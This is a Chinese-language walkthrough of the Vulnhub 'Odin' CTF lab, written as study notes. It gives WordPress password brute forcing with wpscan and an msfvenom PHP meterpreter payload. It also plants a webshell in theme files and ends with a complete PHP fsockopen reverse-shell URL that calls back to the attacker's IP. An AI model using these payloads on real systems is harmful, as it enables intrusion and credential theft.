netdiscover找靶机的ip,然后nmap扫全端口
dirb扫目录的时候,看到wp-admin,应该是wordpress,bp访问发现host要求是odin。hosts改动
linux下改hosts
我是一开始,权限的话能给的全给了,然后死活没找到修改只读的这项的相关资料。
后来找到了win10下hosts文件修改不能保存问题解决详见:
改hosts前打开的图
改hosts之后打开的图
然后就用wpscan爆破wordpress后台账号为admin的密码(wp-login.php的时候能尝试出有admin这个账号)。用kali自带的rockyou字典
用msfvenom生成的php马,传上了404.php的页面msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.0.101 lport=1234 -f raw -o shell.php
wp后台,直接用shell.php的代码替换404.php的代码
nc开监听和msf handler都不行,能连上但不能执行命令。不知道为什么
访问的页面http://odin/wp-content/themes/twentytwenty/404.php
1 | nc: |
换了种方法。直接用msf有的wp-admin的上传。
shell之后直接查看wp-config.php文件cat /var/www/html/wp-config.php
john破解root密码
看到一种直接通过system来反弹shell的,雀氏也可以
之前404.php给改过了,这次改footer.php
?cmd=ls,可以回显
通过php来反弹shell
1 | http://odin/wp-content/themes/twentytwenty/footer.php?cmd=php+-r+%27$sock%3dfsockopen(%22192.168.0.101%22,1234)%3bexec(%22/bin/sh+-i+%3C%263+%3E%263+2%3E%263%22)%3b%27 |
url解码后
1 | http://odin/wp-content/themes/twentytwenty/footer.php?cmd=php -r '$sock=fsockopen("192.168.0.101",1234);exec("/bin/sh -i <&3 >&3 2>&3");' |
其他参考:
1.
https://resources.infosecinstitute.com/topic/odin-vulnhub-ctf-walkthrough/